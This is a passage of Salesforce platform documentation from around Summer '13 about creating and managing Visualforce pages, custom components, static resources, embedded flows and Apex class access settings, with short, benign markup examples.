Note:  In Summer ’13, the only way to add a valid CSRF token to a URL is to override an object’s standard Delete
link with a Visualforce page. The Delete link will automatically include the required token. Don’t check this box
for any page that doesn’t override an object’s standard Delete link.

9. In the Visualforce Markup text box, enter Visualforce markup for the page. A single page can hold up to 1 MB of
text, or approximately 1,000,000 characters.

10. Click Version Settings to specify the version of Visualforce and the API used with this page. You can also specify versions
for any managed packages installed in your organization.

11. Click Save to save your changes and return to the Visualforce detail screen, or click Quick Save to save your changes and
continue editing your page. Your Visualforce markup must be valid before you can save your page.

Note:  Though your Visualforce markup can be edited from this part of Setup, to see the results of your edits you
have to navigate to the URL of your page. For that reason, most developers prefer to work with development
mode enabled so they can view and edit pages in a single window.

Once your page has been created, you can access it using a URL in the following form:
http://mySalesforceInstance/apex/nameOfNewPage, where the value of mySalesforceInstance is the host name
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of your Salesforce instance (for example, na3.salesforce.com) and the value of nameOfNewPage is the value of the Name
field on your page definition.

See Also:
Enabling Development Mode
Viewing and Editing Visualforce Pages
Creating Visualforce Tabs

Enabling Development Mode
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable development mode:

Although you can view and edit Visualforce page definitions from Setup, in Develop > Pages, enabling Visualforce development
mode is the best way to build Visualforce pages. Development mode provides you with:

• A special development footer on every Visualforce page that includes the page’s view state, any associated controller, a link
to the component reference documentation, and a page markup editor that offers highlighting, find-replace functionality,
and auto-suggest for component tag and attribute names.

• The ability to define new Visualforce pages just by entering a unique URL.

• Error messages that include more detailed stack traces than what standard users receive.

To enable Visualforce development mode:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Details.

3. Click Edit.
4. Select the Development Mode checkbox.
5. Optionally, select the Show View State in Development Mode checkbox to enable the View State tab on the

development footer. This tab is useful for monitoring the performance of your Visualforce pages.
6. Click Save.
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Viewing and Editing Visualforce Pages
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To clone, edit, or delete Visualforce markup:

“Author Apex”To edit custom Visualforce controllers

From Setup, click Develop > Pages and click the name of a Visualforce page to view its details, including when it was created,
when it was last modified, and the Visualforce markup associated with the page.

From the detail page, you can do any of the following:

• Click Edit to edit existing page markup.

• Click Delete to delete the page.

• Click Clone to create a copy of the page. You must specify a new name for the new page.

• Click Where is this used? to view a list of all references to the page in your organization.

• Click Show Dependencies to display the items, such as fields, objects, or other classes, that must exist for this class to be
valid.

Note:  If the Visualforce page is contained in an installed managed package, you can only view the page. You can’t
edit, delete or clone it.

If the Visualforce page is contained in an installed managed package, the Installed Package indicates the package name.
The Available in Package Versions field gives the range of package versions in which the Visualforce page is available.
The first version number in the range is the first installed package version that contains the Visualforce page.

Viewing and Editing Visualforce Pages with Development Mode Enabled

With development mode enabled, you can view and edit the content of a page by navigating to the URL of the page. For
example, if a page is named HelloWorld, and your salesforce.com instance is na3.salesforce.com, enter
https://na3.salesforce.com/apex/HelloWorld in your browser's address bar.

After enabling development mode, all Visualforce pages display with the development mode footer at the bottom of the
browser:

• Click the tab with the name of the page to open the page editor to view and edit the associated Visualforce markup without
having to return to the Setup area. Changes display immediately after you save the page.

• If the page uses a custom controller, the name of the controller class is available as a tab. Click the tab to edit the associated
Apex class.

• If the page uses any controller extensions, the names of each extension are available as tabs. Clicking on the tab lets you
edit the associated Apex class.

• If enabled in Setup, the View State tab displays information about the items contributing to the view state of the Visualforce
page.

• Click Save (just above the edit pane) to save your changes and refresh the content of the page.
• Click Component Reference to view the documentation for all supported Visualforce components.
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• Click Where is this used? to view a list of all items in Salesforce that reference the page, such as custom tabs, controllers,
or other pages.

• Click the Collapse button ( ) to collapse the development mode footer panel. Click the Expand button ( ) to toggle it
back open.

• Click the Disable Development Mode button ( ) to turn off development mode entirely. Development mode remains
off until you enable it again from your personal information page in your personal settings.

Managing Visualforce Pages
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit Visualforce pages:

After creating Visualforce pages, you can customize, edit, and delete them. From Setup, click Develop > Pages to display the
Pages list page, which shows all the Visualforce pages defined for your organization. From the Pages list page, you can:

• Click New to define a new Visualforce page.

• Click a page name to display detailed information about the page, including its label and Visualforce markup.

• Click Edit next to a page name to modify the page’s name, label, or Visualforce markup.

Note: A  icon indicates that a Visualforce page is in an installed managed package. You can’t edit or delete a
Visualforce page in a managed package.

• Click Del to remove a page.

• Click Security to manage the security for the page.

Note:  The namespace prefix is added to Apex classes and triggers, Visualforce components and pages, brand templates,
folders, s-controls, static resources, web links, and custom report types if they are included in a managed package.
However, if you don't have customize application permissions, the namespace prefix field is not displayed for brand
templates, folders, and custom report types.

Merge Fields for Visualforce Pages
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.
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Visualforce pages use the same expression language as formulas—that is, anything inside {! } is evaluated as an expression
that can access values from records that are currently in context. For example, you can display the current user's first name by
adding the {!$User.FirstName} merge field to a page.

<apex:page>
Hello {!$User.FirstName}!

s</apex:page>

If your user’s name is John, the page will display Hello John!

You also can use merge fields or other functions to personalize your object-level help content.

See Also:
Defining Visualforce Pages

Creating Visualforce Tabs
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create Visualforce Tabs:

You can build Visualforce tabs so that users can access Visualforce pages from within Salesforce.

To create a Visualforce tab:

1. From Setup, click Create > Tabs.
2. Click New in the Visualforce Tabs related list.
3. Select the Visualforce page to display in the custom tab. If you have not already created the Visualforce page, click Create

a new page now.
4. Enter a label to display on the tab.
5. Click the Tab Style lookup icon to display the Tab Style Selector.

If a tab style is already in use, a number enclosed in brackets [] appears next to the tab style name. Hover your mouse over
the style name to view the tabs that use the style. Click Hide styles which are used on other tabs to filter
this list.

6. Click a tab style to select the color scheme and icon for the custom tab.

Optionally, click Create your own style on the Tab Style Selector dialog if you want to create a custom tab style and your
organization has access to the Documents tab. To create your own tab style:

a. Click the Color lookup icon to display the color selection dialog and click a color to select it.
b. Click Insert an Image, select the document folder, and select the image you want to use.

Alternatively, click Search in Documents, enter a search term, and click Go! to find a document file name that includes
your search term.
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Note:  This dialog only lists files in document folders that are under 20 KB and have the Externally Available
checkbox selected in the document property settings. If the document used for the icon is later deleted, Salesforce

replaces it with a default multicolor block icon ( ).

c. Select a file and click OK. The New Custom Tab wizard reappears.

7. Optionally, select the Mobile Ready checkbox to indicate that the Visualforce page displays and functions properly in the
Salesforce Classic app.

Selecting the checkbox adds the tab to the list of available tabs for your Salesforce Classic configurations. Before mobilizing
a Visualforce tab, review the Salesforce Classic tab considerations to ensure that the Visualforce pages in your tabs are
compatible with mobile browsers.

Note:  The Mobile Ready checkbox is only visible if Salesforce Classic is enabled for your organization.

This setting doesn’t affect the display of Visualforce tabs in Salesforce Touch. To enable a new Visualforce tab
for use in Salesforce Touch, see Defining Visualforce Pages on page 3592.

8. Optionally, choose a custom link to use as the introductory splash page when users initially click the tab. Note that splash
pages don’t display in the mobile application. Avoid using a splash page if you plan to mobilize this tab.

9. Enter a description of the tab, if desired, and click Next.
10. Choose the user profiles for which the new custom tab will be available:

• Select Apply one tab visibility to all profiles and choose Default On, Default Off, or Tab Hidden from the drop-down
list.

• Alternatively, select Apply a different tab visibility for each profile and choose Default On, Default Off, or Tab
Hidden from the drop-down list for each profile.

11. Specify the custom apps that should include the new tab.
12. Check Append tab to users' existing personal customizations to add the new tab to your users’ customized

display settings if they have customized their personal display.
13. Click Save.

See Also:
Defining Visualforce Pages

Uncaught Exceptions in Visualforce
If a Visualforce page that you did not develop has a error or uncaught exception

• You see a simple explanation of the problem in Salesforce.

• The developer who wrote the page receives the error via email with your organization and user id. No other user data is
included in the report.

If you are in development mode and not in the same namespace as the page, you will see the exception message, the exception
type, and a notification that the developer has been notified by email.
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If you are the developer and in the same namespace as the page, and you are not in development mode, you will see an exception
message. You may also see a message indicating that the developer has been notified. If you are in development mode, you
will see the exception message, the exception type, and the Apex stack trace.

See Also:
Debugging Your Code

Managing Version Settings for Visualforce Pages and
Custom Components

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and set version settings for Visualforce pages:

To aid backwards-compatibility, each Visualforce page and custom component is saved with version settings for the specified
version of the API as well as the specific version of Visualforce. If the Visualforce page or component references installed
managed packages, the version settings for each managed package referenced by the page or component is saved too. This
ensures that as Visualforce, the API, and the components in managed packages evolve in subsequent versions, Visualforce
pages and components are still bound to versions with specific, known behavior.

A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without
breaking existing customer integrations using the package.

Note: Package components and Visualforce custom component are distinct concepts. A package is comprised of
many elements, such as custom objects, Apex classes and triggers, and custom pages and components.

To set the Salesforce API and Visualforce version for a Visualforce page or custom component:

1. Edit a Visualforce page or component and click Version Settings.

Note:  You can only access the version settings for a page or custom component if you edit it from Setup, in
Develop. You can’t access version settings if you edit using Developer Mode.

2. Select the Version of the Salesforce API. This is also the version of Visualforce used with the page or component.
3. Click Save.

To configure the package version settings for a Visualforce page or custom component:

1. Edit a Visualforce page or component and click Version Settings.
2. Select a Version for each managed package referenced by the Visualforce page or component. This version of the managed

package will continue to be used by the page or component if later versions of the managed package are installed, unless
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you manually update the version setting. To add an installed managed package to the settings list, select a package from
the list of available packages. The list is only displayed if you have an installed managed package that isn’t already associated
with the page or component.

3. Click Save.

Note the following when working with package version settings:

• If you save a Visualforce page or custom component that references a managed package without specifying a version of the
managed package, the page or component is associated with the latest installed version of the managed package by default.

• You can’t Remove a Visualforce page or component’s version setting for a managed package if the package is referenced
by the page or component. Use Show Dependencies to find where the managed package is referenced.

Browser Security Settings and Visualforce
Some Visualforce pages are run from *.force.com servers. If you set your browser’s trusted sites to include
*.salesforce.com, you must also add *.force.com to the list.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Depending on your browser and browser settings, you may see an error similar to the following on some pages:

Your browser privacy settings have prevented this page from showing some content.
To display this content you need to change your browser privacy settings to allow
"Third Party" cookies from the domain mypages.na1.visual.force.com. Alternatively,
if your browser is Internet Explorer, you can add mypages.na1.visual.force.com. to
your trusted sites list in the security options page.

Salesforce includes a Platform for Privacy Preferences Project (P3P) header on some pages. The header is composed of the
following settings:

Purpose

CUR - Information is used to complete the activity for which it was provided.

Category

STA - Mechanisms for maintaining a stateful session with a user or automatically recognizing users who have visited a
particular site or accessed particular content previously; for example, HTTP cookies.

Recipient

OTR - Legal entities following different practices. Users cannot opt-in or opt-out of this usage.

If your browser is configured to support P3P, this header allows all Visualforce pages to display. For information on P3P, see
Platform for Privacy Preferences (P3P) Project.

If your browser is set to block third-party cookies, and it does not use the P3P header, and you see an error similar to the one
above, perform one of the following actions:

• Configure P3P for your browser

• Change your browser settings to allow third-party cookies

• Add the appropriate server to your browser's cookies exception list
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CUSTOM COMPONENTS

What is a Custom Component?
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Salesforce provides a library of standard, pre-built components, such as <apex:relatedList> and <apex:dataTable>,
that can be used to develop Visualforce pages. In addition, you can build your own custom components to augment this library.

A custom component encapsulates a common design pattern that can be reused in one or more Visualforce pages. It consists
of:

• A set of Visualforce markup demarcated by the <apex:component> tag

• An optional component controller written in Apex that allows the component to perform additional logic, such as sorting
items in a list, or calculating values

For example, suppose you want to create a photo album using Visualforce pages. Each photo in the album has its own border
color, and a text caption that displays beneath it. Rather than repeating the Visualforce markup required for displaying every
photo in the album, you can define a custom component named singlePhoto that has attributes for image, border color,
and caption, and then uses those attributes to display the image on the page. Once defined, every Visualforce page in your
organization can leverage the singlePhoto custom component in the same way as a page can leverage standard components
such as <apex:dataTable> or <apex:relatedList>.

Unlike page templates, which also enable developers to reuse markup, custom components provide more power and flexibility
because:

• Custom components allow developers to define attributes that can be passed in to each component. The value of an attribute
can then change the way the markup is displayed on the final page, and the controller-based logic that executes for that
instance of the component. This behavior differs from that of templates, which do not have a way of passing information
from the page that uses a template to the template's definition itself.

• Custom component descriptions are displayed in the application's component reference dialog alongside standard component
descriptions. Template descriptions, on the other hand, can only be referenced through the Setup area of Salesforce because
they are defined as pages.

See Also:
Defining Visualforce Custom Components
Viewing and Editing Visualforce Custom Components
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Defining Visualforce Custom Components
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create custom components:

To create a Visualforce custom component:

1. In Salesforce from Setup, click Develop > Components.
2. Click New.
3. In the Label text box, enter the text that should be used to identify the custom component in Setup tools.
4. In the Name text box, enter the text that should identify this custom component in Visualforce markup. This name can

contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a
letter, not include spaces, not end with an underscore, and not contain two consecutive underscores.

5. In the Description text box, enter a text description of the custom component. This description appears in the component
reference with other standard component descriptions as soon as you click Save.

6. In the Body text box, enter Visualforce markup for the custom component definition. A single component can hold up to
1 MB of text, or approximately 1,000,000 characters.

7. Click Version Settings to specify the version of Visualforce and the API used with this component. You can also specify
versions for any managed packages installed in your organization.

8. Click Save to save your changes and view the custom component’s detail screen, or click Quick Save to save your changes
and continue editing your component. Your Visualforce markup must be valid before you can save your component.

Note:  You can also create a custom component in Visualforce development mode by adding a reference to a custom
component that doesn’t yet exist to Visualforce page markup. After saving the markup, a quick fix link appears that
allows you to create a new component definition (including any specified attributes) based on the name that you
provided for the component.

For example, if you haven’t yet defined a custom component named myNewComponent and insert
<c:myNewComponent myNewAttribute="foo"/> into existing page markup, after clicking Save a quick fix
allows you to define a new custom component named myNewComponent with the following default definition:

<apex:component>
<apex:attribute name="myattribute" type="String" description="TODO: Describe me"/>

<!-- Begin Default Content REMOVE THIS -->
<h1>Congratulations</h1>
This is your new Component: mynewcomponent
<!-- End Default Content REMOVE THIS -->

</apex:component>
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You can modify this definition from Setup by clicking Develop > Components and then clicking Edit next to the
myNewComponent custom component.

See Also:
What is a Custom Component?
What is a Custom Component?

Viewing and Editing Visualforce Custom Components
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To clone, edit, delete, or set versions for custom components:

From Setup, click Develop > Components and click the name of a custom component to view its definition.

From the detail page, you can do any of the following:

• Click Edit to edit the custom component.

• Click Delete to delete the custom component.

• Click Clone to create a copy of the custom component. You must specify a new name for the new component.

• Click Where is this used? to view a list of all references to the custom component in your organization.

• Click Show Dependencies to display the items, such as another component, permission, or preference, that must exist for
this custom component to be valid.

Once your component has been created, you can view it at
http://mySalesforceInstance/apexcomponent/nameOfNewComponent, where the value of mySalesforceInstance
is the host name of your Salesforce instance (for example, na3.salesforce.com) and the value of nameOfNewComponent
is the value of the Name field on the custom component definition.

The component is displayed as if it’s a Visualforce page. Consequently, if your component relies on attributes or on the content
of the component tag’s body, this URL may generate results that you don’t expect. To more accurately test a custom component,
add it to a Visualforce page and then view the page.

See Also:
What is a Custom Component?
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Managing Visualforce Custom Components
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit custom components:

After creating custom components, you can view, edit and delete them. From Setup, click Develop > Components to display
the Components list page, which shows the list of custom components defined for your organization. From this page you can:

• Click New to define a new custom component.

• Click a custom component name to display detailed information about the component.

• Click Edit to modify a component's name or markup.

Note: A  icon indicates that a Visualforce custom component is in an installed managed package. You can’t

edit or delete a Visualforce custom component in a managed package. A  icon indicates that a Visualforce
custom component in a previously released managed package will be deleted on the next package upload. You can
choose to undelete the Visualforce custom component through the package detail page.

• Click Del to remove a custom component from your organization.

Note:  The namespace prefix is added to Apex classes and triggers, Visualforce components and pages, brand templates,
folders, s-controls, static resources, web links, and custom report types if they are included in a managed package.
However, if you don't have customize application permissions, the namespace prefix field is not displayed for brand
templates, folders, and custom report types.

STATIC RESOURCES

What is a Static Resource?
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Static resources allow you to upload content that you can reference in a Visualforce page, including archives (such as .zip and
.jar files), images, stylesheets, JavaScript, and other files.

Using a static resource is preferable to uploading a file to the Documents tab because:

• You can package a collection of related files into a directory hierarchy and upload that hierarchy as a .zip or .jar archive.

• You can reference a static resource in page markup by name using the $Resource global variable instead of hard-coding
document IDs:
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◊ To reference a stand-alone file, use $Resource.<resource_name> as a merge field, where <resource_name> is
the name you specified when you uploaded the resource. For example:

<apex:image url="{!$Resource.TestImage}" width="50" height="50"/>

or

<apex:includeScript value="{!$Resource.MyJavascriptFile}"/>

◊ To reference a file in an archive, use the URLFOR function. Specify the static resource name that you provided when
you uploaded the archive with the first parameter, and the path to the desired file within the archive with the second.
For example:

<apex:image url="{!URLFOR($Resource.TestZip,
'images/Bluehills.jpg')}" width="50" height="50"/>

or

<apex:includeScript value="{!URLFOR($Resource.LibraryJS, '/base/subdir/file.js')}"/>

• You can use relative paths in files in static resource archives to refer to other content within the archive. For example, in
your CSS file, named styles.css, you have the following style:

table { background-image: img/testimage.gif }

When you use that CSS in a Visualforce page, you need to make sure the CSS file can find the image. To do that, create
an archive (such as a zip file) that includes styles.css and img/testimage.gif. Make sure that the path structure
is preserved in the archive. Then upload the archive file as a static resource named “style_resources”. Then, in your page,
add the following component:

<apex:stylesheet value="{!URLFOR($Resource.style_resources, 'styles.css')}"/>

Since the static resource contains both the stylesheet and the image, the relative path in the stylesheet resolves and the
image is displayed.

A single static resource can be up to 5 MB in size, and an organization can have up to 250 MB of static resources, total. Static
resources apply to your organization’s quota of data storage.

See Also:
Defining Static Resources
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Defining Static Resources
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create static resources:

To create a static resource:

1. From Setup, click Develop > Static Resources.
2. Click New Static Resource.
3. In the Name text box, enter the text that should be used to identify the resource in Visualforce markup. This name can

contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a
letter, not include spaces, not end with an underscore, and not contain two consecutive underscores.

Note:  If you reference a static resource in Visualforce markup and then change the name of the resource, the
Visualforce markup is updated to reflect that change.

4. In the Description text area, specify an optional description of the resource.
5. Next to the File text box, click Browse to navigate to a local copy of the resource that you want to upload.

A single static resource can be up to 5 MB in size, and an organization can have up to 250 MB of static resources, total.

6. Set the Cache Control:

• Private specifies that the static resource data cached on the Salesforce server shouldn’t be shared with other users.
The static resource is only stored in cache for the current user’s session.

Note: Cache settings on static resources are set to private when accessed via a Force.com site whose guest
user's profile has restrictions based on IP range or login hours. Sites with guest user profile restrictions cache
static resources only within the browser. Also, if a previously unrestricted site becomes restricted, it can take
up to 45 days for the static resources to expire from the Salesforce cache and any intermediate caches.

• Public specifies that the static resource data cached on the Salesforce server be shared with other users in your
organization for faster load times.

The W3C specifications on Header Field Definitions has more technical information about cache-control.

Note:  This feature only works for Sites—enabled organizations that use the static resource.

7. Click Save.
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Warning:  If you are using WinZip be sure to install the most recent version. Older versions of WinZip may cause
a loss of data.

See Also:
Viewing and Editing Static Resources
What is a Static Resource?

Viewing and Editing Static Resources
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To clone, edit, or delete static resources:

From Setup, click Develop > Static Resources and click the name of a resource to view its details, including its MIME type,
the size of the resource in bytes, when it was created, and when it was last modified.

From the detail page, you can do any of the following:

• Click Edit to edit the resource.

• Click Delete to delete the resource.

• Click Clone to create a copy of the resource. You must specify a new name for the new resource.

• Click Where is this used? to view a list of all references to the static resource in your organization.

See Also:
Defining Static Resources
Managing Static Resources
What is a Static Resource?

3607

Viewing and Editing Static ResourcesCode



Managing Static Resources
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and edit static resources:

After creating static resources, you can customize, edit, and delete them. From Setup, click Develop > Static Resources to
display the Static Resources list page, which shows the list of resources defined for your organization. From this page you can:

• Click New Static Resource to define a new static resource.

• Click a resource name to display detailed information about the page, including its MIME type and size.

• Click Edit next to a resource to modify the resource's name or to upload a new version of the resource.

• Click Del to remove a resource.

Note:  The namespace prefix is added to Apex classes and triggers, Visualforce components and pages, brand templates,
folders, s-controls, static resources, web links, and custom report types if they are included in a managed package.
However, if you don't have customize application permissions, the namespace prefix field is not displayed for brand
templates, folders, and custom report types.

See Also:
Viewing and Editing Static Resources
What is a Static Resource?
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FLOWS IN VISUALFORCE

Adding a Flow to a Visualforce Page
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and set version settings for Visualforce pages:

“Manage Force.com Flow”To activate, deactivate, or delete a flow, or to edit flow
properties:

To customize a flow’s look and feel or enhance its functionality you can embed it as a component in a Visualforce page. If
your organization has flows enabled for sites and portals, you can then deliver the flow to your Force.com site, Customer
Portal, or partner portal users.

Note: Users can only run flows that have an active version. If the flow you embed doesn't have an active version,
users see an error message. If the flow you embed includes a subflow element, the flow that is referenced and called
by the subflow element must have an active version.

To add a flow to a Visualforce page, embed it using the <flow:interview> component:

1. Find the flow's unique name:

a. Go to the flow list page. From Setup, click Create > Workflow & Approvals > Flows.
b. Click the name of the flow you want to embed.

2. Define a new Visualforce page or open one that you want to edit.
3. Add the <flow:interview> component, somewhere between the <apex:page> tags.
4. Set the name attribute to the unique name of the flow. For example:

<apex:page>
<flow:interview name="MyUniqueFlowName"/>
</apex:page>

Note: If the flow is from a managed package, then the name attribute must be in this format:
namespace.flowuniquename.

5. Restrict which users can run the flow by setting the page security for the Visualforce page that contains it.

If the Visualforce page containing the flow is delivered externally to site or portal users, any of those users with access to
the Visualforce page can run the embedded flow.
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If the Visualforce page containing the flow is delivered to users within your organization through a custom Web tab, link,
or button, users must have access to the page. They must also have the “Run Flows” permission or have the Force.com
Flow User field enabled on their user detail page.

6. Specify what happens when a user clicks Finish in a flow screen by setting the flow finish behavior.

See Also:
Visual Workflow Overview
Managing Force.com Site Visualforce Pages

Setting Flow Finish Behavior
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and set version settings for Visualforce pages:

Because flows are rendered using Visualforce, you can use the finishLocation attribute to redirect users to another screen
in Salesforce when they click Finish.

Note:

• If finishLocation isn't specified, users that click Finish are routed back to the first screen of the flow.

• If you use a standard controller to display a record on the same page as the flow, users that click Finish are routed
back to the first screen of the flow, without the record. This is because the id query string parameter isn’t preserved
in the page URL. If needed, configure the finishLocation to route users back to the record.

• You can't redirect flow users to a URL that’s external to your Salesforce organization.

Set a flow's final screen in one of these ways.

• Embed the flow as a component in a Visualforce page and configure finishLocation manually.

Here's a simple example, using the URLFOR function. You can use URLFOR to:

◊ Route users to a relative URL, such as the Salesforce home page.

<apex:page>
<flow:interview name="flowname" finishLocation="{!URLFOR('/home/home.jsp')}"/>

</apex:page>

◊ Route users to a specific record or detail page using its ID. For example, if you wanted to route users to a detail page
with an ID of 001D000000IpE9X:

<apex:page>
<flow:interview name="flowname" finishLocation="{!URLFOR('/001D000000IpE9X')}"/>

</apex:page>
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For more examples, see "Configuring the finishLocation Attribute in a Flow" in the Visualforce Developer's Guide.

Note:

• If you deliver a flow to your users from a custom button, link, or Web tab that points to the flow URL, we
recommend against using retURL in the URL path to redirect them. Using retURL can cause the destination
page you specify to be rendered with top and side navigation bars nested within the existing Salesforce top and
side navigation bars.

• You can't redirect flow users to a URL that’s external to your Salesforce organization.

See Also:
Adding a Flow to a Visualforce Page
Adding a Flow to a Visualforce Page

Enabling and Disabling Chat for Visualforce Pages
Add a chat widget to your custom Visualforce pages.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

User Permissions Needed

“Customize Application”To enable chat for custom Visualforce pages

1. From Setup, click Customize > Chatter > Chat Settings.
2. Click Edit.
3. Under Visualforce Settings, select Allow.

Deselect to disable chat for custom Visualforce pages.

4. Click Save.

To prevent the chat widget from displaying on a specific Visualforce page, do any of the following:

• Turn off the Salesforce tab header on your page by setting <apex:page showHeader=”false”>.
• Set the page contentType to something other than text/html, for example, <apex:page

contentType="text/plain">.
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CODE SECURITY

Securing Your Code
This section contains information about implementing security in your code.

• Apex Class Security Overview

• Setting Visualforce Page Security from a Page Definition

• Security Tips for Apex and Visualforce Development

APEX SECURITY

Apex Class Security Overview
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

You can specify which users can execute methods in a particular top-level Apex class based on their profile or an associated
permission set. These permissions only apply to Apex class methods, such as Web service methods, or any method used in a
custom Visualforce controller or controller extension applied to a Visualforce page. Triggers always fire on trigger events (such
as insert or update), regardless of a user's permissions.

Note:  If you have installed a managed package in your organization, you can set security only for the Apex classes
in that package that are declared as global, or for classes that contain methods declared as webService.

If users have the “Author Apex” permission, they can access all Apex classes in the associated organization, regardless
of the security setting for individual classes.

Permission for an Apex class is checked at the top level only. For example, if class A calls class B, and a user profile has access
only to class A but not class B, the user can still execute the code in class A. Likewise, if a Visualforce page uses a custom
component with an associated controller, security is only checked for the controller associated with the page. The controller
associated with the custom component executes regardless of permissions.

You can set Apex class security via:

• The Apex class list page

• An Apex class detail page

• Permission sets
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• Profiles

See Also:
Security Tips for Apex and Visualforce Development
Force.com Apex Code Developer's Guide

Setting Apex Class Access from the Class List Page
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”

AND

“Customize Application”

To set Apex class security:

1. From Setup, click Develop > Apex Classes.
2. Next to the name of the class that you want to restrict, click Security.
3. Select the profiles that you want to enable from the Available Profiles list and click Add, or select the profiles that you

want to disable from the Enabled Profiles list and click Remove.
4. Click Save.

See Also:
Setting Apex Class Access from the Class Detail Page
Setting Apex Class Access from Permission Sets
Setting Apex Class Access from Profiles
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Setting Apex Class Access from the Class Detail Page
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”

AND

“Customize Application”

To set Apex class security:

1. From Setup, click Develop > Apex Classes.
2. Click the name of the class that you want to restrict.
3. Click Security.
4. Select the profiles that you want to enable from the Available Profiles list and click Add, or select the profiles that you

want to disable from the Enabled Profiles list and click Remove.
5. Click Save.

See Also:
Setting Apex Class Access from the Class List Page
Setting Apex Class Access from Permission Sets
Setting Apex Class Access from Profiles

Setting Apex Class Access from Permission Sets
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Manage Users”To edit Apex class access settings:

You can specify which methods in a top-level Apex class are executable for a permission set. These settings only apply to Apex
class methods, such as Web service methods, or any method used in a custom Visualforce controller or controller extension
applied to a Visualforce page. Triggers always fire on trigger events (such as insert or update), regardless of permission
settings.

1. From Setup, click Manage Users > Permission Sets.
2. Select a permission set.
3. Click Apex Class Access.
4. Click Edit.
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5. Select the Apex classes that you want to enable from the Available Apex Classes list and click Add, or select the Apex
classes that you want to disable from the Enabled Apex Classes list and click Remove.

6. Click Save.

See Also:
Setting Apex Class Access from the Class List Page
Setting Apex Class Access from the Class Detail Page
Setting Apex Class Access from Profiles

Setting Apex Class Access from Profiles
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Manage Users”To edit profiles:

You can specify which methods in a top-level Apex class are executable for a profile.  These settings only apply to Apex class
methods, such as Web service methods, or any method used in a custom Visualforce controller or controller extension applied
to a Visualforce page. Triggers always fire on trigger events (such as insert or update), regardless of profile settings.

1. From Setup, click Manage Users > Profiles.
2. Select a profile and click its name.
3. In the Apex Class Access page or related list, click Edit.
4. Select the Apex classes that you want to enable from the Available Apex Classes list and click Add, or select the Apex

classes that you want to disable from the Enabled Apex Classes list and click Remove.
5. Click Save.

See Also:
Setting Apex Class Access from the Class List Page
Setting Apex Class Access from the Class Detail Page
Setting Apex Class Access from Permission Sets
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Creating Apex Sharing Reasons
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Author Apex”To create Apex sharing reasons:

“View Setup and Configuration”To view Apex sharing reasons:

When creating Apex managed sharing, create Apex sharing reasons for individual custom objects to indicate why sharing was
implemented, simplify the coding required to update and delete sharing records, and share a record multiple times with the
same user or group using different Apex sharing reasons.

Note:  For more information on Apex managed sharing, see the Force.com Apex Code Developer’s Guide.

Salesforce displays Apex sharing reasons in the Reason column when viewing the sharing for a custom object record in the
user interface. This allows users and administrators to understand the purpose of the sharing.

When working with Apex sharing reasons, note the following:

• Only users with the “Modify All Data” permission can add, edit, or delete sharing that uses an Apex sharing reason.

• Deleting an Apex sharing reason will delete all sharing on the object that uses the reason.

• You can create up to 10 Apex sharing reasons per custom object.

• You can create Apex sharing reasons using the Metadata API.

To create an Apex sharing reason:

1. From Setup, click Create > Objects.
2. Select the custom object.
3. Click New in the Apex Sharing Reasons related list.
4. Enter a label for the Apex sharing reason. The label displays in the Reason column when viewing the sharing for a record

in the user interface. The label is also enabled for translation through the Translation Workbench.
5. Enter a name for the Apex sharing reason. The name is used when referencing the reason in the API and Apex. This name

can contain only underscores and alphanumeric characters, and must be unique in your organization. It must begin with
a letter, not include spaces, not end with an underscore, and not contain two consecutive underscores.

6. Click Save.

See Also:
Recalculating Apex Managed Sharing
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Recalculating Apex Managed Sharing
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Author Apex”To associate an Apex managed sharing recalculation class:

“Author Apex” OR “Manage Users”To run an Apex managed sharing recalculation:

Important:  When packaging custom objects, be aware that associated Apex sharing recalculations are also included
and may prevent the package from installing.

